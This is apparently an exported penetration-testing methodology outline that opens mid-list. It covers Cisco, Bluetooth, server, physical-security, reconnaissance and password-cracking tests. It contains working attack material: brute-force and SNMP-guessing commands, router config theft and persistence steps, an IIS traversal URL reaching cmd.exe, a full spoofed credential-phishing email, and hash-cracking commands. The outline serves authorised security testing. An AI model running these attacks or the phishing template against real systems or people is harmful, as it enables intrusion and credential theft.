19.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
19.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
19.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
19.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
19.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
19.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
19.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
19.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
19.1.3.2. Access with Work Station Gateway
19.1.3.2.1. http://target:5061/WSG
19.1.3.2.2. Default AS/400 accounts.
19.1.3.3. Network attacks (next release)
19.1.3.3.1. DB2
19.1.3.3.2. QSHELL
19.1.3.3.3. Hijacking Terminals
19.1.3.3.4. Trojan attacks
19.1.3.3.5. Hacking from AS/400
19.2. Local
19.2.1. System Value Security
19.2.1.1. Untitled
19.2.1.1.1. Untitled
19.2.1.2. Untitled
19.2.1.2.1. Untitled
19.2.1.3. Untitled
19.2.1.3.1. Untitled
19.2.1.4. Untitled
19.2.1.4.1. Recommended value is 30
19.2.2. Password Policy
19.2.2.1. Untitled
19.2.2.1.1. Untitled
19.2.2.1.2. Untitled
19.2.2.2. Untitled
19.2.2.2.1. Untitled
19.2.2.3. Untitled
19.2.2.3.1. Untitled
19.2.2.4. Untitled
19.2.2.4.1. Untitled
19.2.2.5. Untitled
19.2.3. Audit level
19.2.3.1. Untitled
19.2.3.1.1. Recommended value is *SECURITY
19.2.4. Documentation
19.2.4.1. Users class
19.2.4.1.1. Untitled
19.2.4.2. System Audit Settings
19.2.4.2.1. Untitled
19.2.4.3. Special Authorities Definitions
19.2.4.3.1. Untitled
20. Bluetooth Specific Testing
20.1. Bluescanner
20.2. Bluesweep
20.3. btscanner
20.4. Redfang
20.5. Blueprint
20.6. Bluesnarfer
20.7. Bluebugger
20.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
20.8. Blueserial
20.9. Bloover
20.10. Bluesniff
20.11. Exploit Frameworks
20.11.1. BlueMaho
20.11.1.1. Untitled
20.12. Resources
20.12.1. URL's
20.12.1.1. BlueStumbler.org
20.12.1.2. Bluejackq.com
20.12.1.3. Bluejacking.com
20.12.1.4. Bluejackers
20.12.1.5. bluetooth-pentest
20.12.1.6. ibluejackedyou.com
20.12.1.7. Trifinite
20.12.2. Vulnerability Information
20.12.2.1. Common Vulnerabilities and Exploits (CVE)
20.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
20.12.3. White Papers
20.12.3.1. Bluesnarfing
21. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
22. Cisco Specific Testing
22.1. Methodology
22.1.1. Scan & Fingerprint.
22.1.1.1. Untitled
22.1.1.2. Untitled
22.1.1.3. If SNMP is active, then community string guessing should be performed.
22.1.2. Credentials Guessing.
22.1.2.1. Untitled
22.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
22.1.3. Connect
22.1.3.1. Untitled
22.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
22.1.4. Check for bugs
22.1.4.1. Untitled
22.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
22.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
22.1.5. Further your attack
22.1.5.1. Untitled
22.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permenant connection through to the internal network.
22.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permenant connection through to the internal network.
22.1.5.2. Untitled
22.1.5.2.1. #> access-list 100 permit ip <IP> any
22.2. Scan & Fingerprint.
22.2.1. Port Scanning
22.2.1.1. nmap
22.2.1.1.1. Untitled
22.2.1.2. Other tools
22.2.1.2.1. Untitled
22.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
22.2.2. Fingerprinting
22.2.2.1. Untitled
22.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
22.2.2.2. Untitled
22.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
22.2.2.2.2. Untitled
22.3. Password Guessing.
22.3.1. Untitled
22.3.1.1. ./CAT -h <IP> -a password.wordlist
22.3.1.2. Untitled
22.3.2. Untitled
22.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
22.3.2.2. Untitled
22.3.3. Untitled
22.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
22.3.3.2. Untitled
22.4. SNMP Attacks.
22.4.1. Untitled
22.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
22.4.1.2. Untitled
22.4.2. Untitled
22.4.2.1. onesixytone -c SNMP.wordlist <IP>
22.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
22.4.3. Untitled
22.4.3.1. snmapwalk -v <Version> -c <Community string> <IP>
22.4.3.2. Untitled
22.5. Connecting.
22.5.1. Telnet
22.5.1.1. Untitled
22.5.1.1.1. telnet <IP>
22.5.1.1.2. Sample Banners
22.5.2. SSH
22.5.3. Web Browser
22.5.3.1. Untitled
22.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
22.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
22.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
22.5.4. TFTP
22.5.4.1. Untitled
22.5.4.1.1. Untitled
22.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
22.5.4.2. Untitled
22.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
22.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
22.5.4.2.3. Creating backdoors in Cisco IOS using TCL
22.6. Known Bugs.
22.6.1. Attack Tools
22.6.1.1. Untitled
22.6.1.1.1. Untitled
22.6.1.2. Untitled
22.6.1.2.1. Web browse to the Cisco device: http://<IP>
22.6.1.2.2. Untitled
22.6.1.2.3. Untitled
22.6.1.2.4. Untitled
22.6.1.3. Untitled
22.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
22.6.2. Common Vulnerabilities and Exploits (CVE) Information
22.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
22.7. Configuration Files.
22.7.1. Untitled
22.7.1.1. Configuration files explained
22.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
22.7.1.1.2. Untitled
22.7.1.1.3. Untitled
22.7.1.1.4. Password Encryption Utilised
22.7.1.1.5. Untitled
22.7.1.2. Configuration Testing Tools
22.7.1.2.1. Nipper
22.7.1.2.2. fwauto (Beta)
22.8. References.
22.8.1. Cisco IOS Exploitation Techniques
23. Server Specific Tests
23.1. Databases
23.1.1. Direct Access Interrogation
23.1.1.1. MS SQL Server
23.1.1.1.1. Ports
23.1.1.1.2. Version
23.1.1.1.3. osql
23.1.1.2. Oracle
23.1.1.2.1. Ports
23.1.1.2.2. TNS Listener
23.1.1.2.3. SQL Plus
23.1.1.2.4. Default Account/Passwords
23.1.1.2.5. Default SID's
23.1.1.3. MySQL
23.1.1.3.1. Ports
23.1.1.3.2. Version
23.1.1.3.3. Users/Passwords
23.1.1.4. DB2
23.1.1.5. Informix
23.1.1.6. Sybase
23.1.1.7. Other
23.1.2. Scans
23.1.2.1. Default Ports
23.1.2.2. Non-Default Ports
23.1.2.3. Instance Names
23.1.2.4. Versions
23.1.3. Password Attacks
23.1.3.1. Sniffed Passwords
23.1.3.1.1. Cracked Passwords
23.1.3.1.2. Hashes
23.1.3.2. Direct Access Guesses
23.1.4. Vulnerability Assessment
23.1.4.1. Automated
23.1.4.1.1. Reports
23.1.4.1.2. Vulnerabilities
23.1.4.2. Manual
23.1.4.2.1. Patch Levels
23.1.4.2.2. Confirmed Vulnerabilities
23.2. Mail
23.2.1. Scans
23.2.2. Fingerprint
23.2.2.1. Manual
23.2.2.2. Automated
23.2.3. Spoofable
23.2.3.1. Telnet spoof
23.2.3.1.1. telnet target_IP 25helo target.commail from: XXXX@XXX.comrcpt to: administrator@target.comdataX-Sender: XXXX@XXX.comX-Originating-IP: [192.168.1.1]X-Originating-Email: [XXXX@XXX.com]MIME-Version: 1.0To: <administrator@target.com>From: < XXXX@XXX.com >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target LtdXXXX@XXX.com.
23.2.4. Relays
23.3. VPN
23.3.1. Scanning
23.3.1.1. 500 UDP IPSEC
23.3.1.2. 1723 TCP PPTP
23.3.1.3. 443 TCP/SSL
23.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
23.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
23.3.2. Fingerprinting
23.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
23.3.3. PSK Crack
23.3.3.1. ikeprobe 80.75.68.27
23.3.3.2. sniff for responses with C&A or ikecrack
23.4. Web
23.4.1. Vulnerability Assessment
23.4.1.1. Automated
23.4.1.1.1. Reports
23.4.1.1.2. Vulnerabilities
23.4.1.2. Manual
23.4.1.2.1. Patch Levels
23.4.1.2.2. Confirmed Vulnerabilities
23.4.2. Permissions
23.4.2.1. PUT /test.txt HTTP/1.0
23.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
23.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6
23.4.3. Scans
23.4.4. Fingerprinting
23.4.4.1. Other
23.4.4.2. HTTP
23.4.4.2.1. Commands
23.4.4.2.2. Modules
23.4.4.2.3. File Extensions
23.4.4.3. HTTPS
23.4.4.3.1. Commands
23.4.4.3.2. Commands
23.4.4.3.3. File Extensions
23.4.5. Directory Traversal
23.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
24. http://secunia.com/advisories/search/?search=citrix
25. Physical Security
25.1. Building Security
25.1.1. Meeting Rooms
25.1.1.1. Check for active network jacks.
25.1.1.2. Check for any information in room.
25.1.2. Lobby
25.1.2.1. Check for active network jacks.
25.1.2.2. Does receptionist/guard leave lobby?
25.1.2.3. Accessbile printers? Print test page.
25.1.2.4. Obtain phone/personnel listing.
25.1.3. Communal Areas
25.1.3.1. Check for active network jacks.
25.1.3.2. Check for any information in room.
25.1.3.3. Listen for employee conversations.
25.1.4. Room Security
25.1.4.1. Resistance of lock to picking.
25.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?
25.1.4.2. Ceiling access areas.
25.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
25.1.5. Windows
25.1.5.1. Check windows/doors for visible intruderalarm sensors.
25.1.5.2. Check visible areas for sensitive information.
25.1.5.3. Can you video users logging on?
25.2. Perimeter Security
25.2.1. Fence Security
25.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
25.2.2. Exterior Doors
25.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.
25.2.3. Guards
25.2.3.1. Patrol Routines
25.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
25.2.3.2. Communications
25.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.
25.3. Entry Points
25.3.1. Guarded Doors
25.3.1.1. Piggybacking
25.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.
25.3.1.2. Fake ID
25.3.1.2.1. Attempt to use fake ID to gain access.
25.3.1.3. Access Methods
25.3.1.3.1. Test 'out of hours' entry methods
25.3.2. Unguarded Doors
25.3.2.1. Identify all unguardedentry points.
25.3.2.1.1. Are doors secured?
25.3.2.1.2. Check locks for resistance to lock picking.
25.3.3. Windows
25.3.3.1. Check windows/doors for visible intruderalarm sensors.
25.3.3.1.1. Attempt to bypass sensors.
25.4. Office Waste
25.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc
26. Final Report - template
27. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
27.1. Untitled
27.1.1. Authoratitive Bodies
27.1.1.1. IANA - Internet Assigned Numbers Authority
27.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
27.1.1.3. NRO - Number Resource Organisation
27.1.1.4. RIR - Regional Internet Registry
27.1.1.4.1. AFRINIC - African Network Information Centre
27.1.1.4.2. APNIC - Asia Pacific Network Information Centre
27.1.1.4.3. ARIN - American Registry for Internet Numbers
27.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
27.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre
27.1.2. Websites
27.1.2.1. Central Ops
27.1.2.1.1. Domain Dossier
27.1.2.1.2. Email Dossier
27.1.2.2. DNS Stuff
27.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
27.1.2.3. Fixed Orbit
27.1.2.3.1. Autonomous System lookups and other online tools available.
27.1.2.4. Geektools
27.1.2.5. IP2Location
27.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
27.1.2.6. Kartoo
27.1.2.6.1. Metasearch engine that visually presents its results.
27.1.2.7. MyIPNeighbors.com
27.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
27.1.2.8. My-IP-Neighbors.com
27.1.2.8.1. Excellent site that can be used if the above is down
27.1.2.9. myipneighbors.net
27.1.2.10. Netcraft
27.1.2.10.1. Online search tool allowing queries for host information.
27.1.2.11. Passive DNS Replication
27.1.2.11.1. Finds shared domains based on supplied IP addresses
27.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script
27.1.2.12. Robtex
27.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
27.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
27.1.2.13. Traceroute.org
27.1.2.13.1. Website listing a large number links to online traceroute resources.
27.1.2.14. Wayback Machine
27.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
27.1.2.15. Whois.net
27.1.3. Tools
27.1.3.1. Cheops-ng
27.1.3.2. Country whois
27.1.3.3. Domain Research Tool
27.1.3.4. Firefox Plugins
27.1.3.4.1. AS Number
27.1.3.4.2. Shazou
27.1.3.4.3. Firecat Suite
27.1.3.5. Gnetutil
27.1.3.6. Goolag Scanner
27.1.3.7. Greenwich
27.1.3.8. Maltego
27.1.3.9. GTWhois
27.1.3.10. Sam Spade
27.1.3.11. Smart whois
27.1.3.12. SpiderFoot
27.2. Internet Search
27.2.1. General Information
27.2.1.1. Web Investigator
27.2.1.2. Tracesmart
27.2.1.3. Friends Reunited
27.2.1.4. Ebay - profiles etc.
27.2.2. Financial
27.2.2.1. EDGAR - Company information, including real-time filings. US
27.2.2.2. Google Finance - General Finance Portal
27.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
27.2.2.4. Companies House UK
27.2.2.5. Land Registry UK
27.2.3. Phone book/ Electoral Role Information
27.2.3.1. 123people
27.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
27.2.3.2. 192.com
27.2.3.2.1. Electoral Role Search. UK
27.2.3.3. 411
27.2.3.3.1. Online White Pages and Yellow Pages. US
27.2.3.4. Untitled
27.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
27.2.3.5. BT.com. UK
27.2.3.5.1. Residential
27.2.3.5.2. Business
27.2.3.6. Pipl
27.2.3.6.1. Untitled
27.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
27.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
27.2.3.7. Spokeo
27.2.3.7.1. http://www.spokeo.com/user?q=domain_name
27.2.3.7.2. http://www.spokeo.com/user?q=email_address
27.2.3.8. Yasni
27.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
27.2.3.9. Zabasearch
27.2.3.9.1. People Search Engine. US
27.2.4. Generic Web Searching
27.2.4.1. Code Search
27.2.4.2. Forum Entries
27.2.4.3. Google Hacking Database
27.2.4.4. Google
27.2.4.4.1. Email Addresses
27.2.4.4.2. Contact Details
27.2.4.5. Newsgroups/forums
27.2.4.6. Blog Search
27.2.4.6.1. Yammer
27.2.4.6.2. Google Blog Search
27.2.4.6.3. Technorati
27.2.4.6.4. Jaiku
27.2.4.6.5. Present.ly
27.2.4.6.6. Twitter Network Browser
27.2.4.7. Search Engine Comparison/ Aggregator Sites
27.2.4.7.1. Clusty
27.2.4.7.2. Grokker
27.2.4.7.3. Zuula
27.2.4.7.4. Exalead
27.2.4.7.5. Delicious
27.2.5. Metadata Search
27.2.5.1. Untitled
27.2.5.1.1. MetaData Visualisation Sites
27.2.5.1.2. Tools
27.2.5.1.3. Wikipedia Metadata Search
27.2.6. Social/ Business Networks
27.2.6.1. Untitled
27.2.6.1.1. Africa
27.2.6.1.2. Australia
27.2.6.1.3. Belgium
27.2.6.1.4. Holland
27.2.6.1.5. Hungary
27.2.6.1.6. Iran
27.2.6.1.7. Japan
27.2.6.1.8. Korea
27.2.6.1.9. Poland
27.2.6.1.10. Russia
27.2.6.1.11. Sweden
27.2.6.1.12. UK
27.2.6.1.13. US
27.2.6.1.14. Assorted
27.2.7. Resources
27.2.7.1. OSINT
27.2.7.2. International Directory of Search Engines
27.3. DNS Record Retrieval from publically available servers
27.3.1. Types of Information Records
27.3.1.1. SOA Records - Indicates the server that has authority for the domain.
27.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
27.3.1.3. NS Records - List of a host’s or domain’s name server(s).
27.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
27.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.
27.3.1.6. SRV Records - Service location record.
27.3.1.7. HINFO Records - Host information record with CPU type and operating system.
27.3.1.8. TXT Records - Generic text record.
27.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
27.3.1.10. RP - Responsible person for the domain.
27.3.2. Database Settings
27.3.2.1. Version.bind
27.3.2.2. Serial
27.3.2.3. Refresh
27.3.2.4. Retry
27.3.2.5. Expiry
27.3.2.6. Minimum
27.3.3. Sub Domains
27.3.4. Internal IP ranges
27.3.4.1. Reverse DNS for IP Range
27.3.5. Zone Transfer
27.4. Social Engineering
27.4.1. Remote
27.4.1.1. Phone
27.4.1.1.1. Scenarios
27.4.1.1.2. Results
27.4.1.1.3. Contact Details
27.4.1.2. Email
27.4.1.2.1. Scenarios
27.4.1.2.2. Software
27.4.1.2.3. Results
27.4.1.2.4. Contact Details
27.4.1.3. Other
27.4.2. Local
27.4.2.1. Personas
27.4.2.1.1. Name
27.4.2.1.2. Phone
27.4.2.1.3. Email
27.4.2.1.4. Business Cards
27.4.2.2. Contact Details
27.4.2.2.1. Name
27.4.2.2.2. Phone number
27.4.2.2.3. Email
27.4.2.2.4. Room number
27.4.2.2.5. Department
27.4.2.2.6. Role
27.4.2.3. Scenarios
27.4.2.3.1. New IT employee
27.4.2.3.2. Fire Inspector
27.4.2.4. Results
27.4.2.5. Maps
27.4.2.5.1. Satalitte Imagery
27.4.2.5.2. Building layouts
27.4.2.6. Other
27.5. Dumpster Diving
27.5.1. Rubbish Bins
27.5.2. Contract Waste Removal
27.5.3. Ebay ex-stock sales i.e. HDD
27.6. Web Site copy
27.6.1. htttrack
27.6.2. teleport pro
27.6.3. Black Widow
28. Password cracking
28.1. Rainbow crack
28.1.1. ophcrack
28.1.2. rainbow tables
28.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
28.2. Ophcrack
28.3. Cain & Abel
28.4. John the Ripper
28.4.1. ./unshadow passwd shadow > file_to_crack
28.4.2. ./john -single file_to_crack
28.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
28.4.4. ./john -show file_to_crack
28.4.5. ./john --incremental:All file_to_crack
28.5. fgdump
28.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
28.6. pwdump6
28.7. medusa
28.8. LCP
28.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
28.9.1. Domain credentials
28.9.2. Sniffing
28.9.3. pwdump import
28.9.4. sam import
28.10. aiocracker
28.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list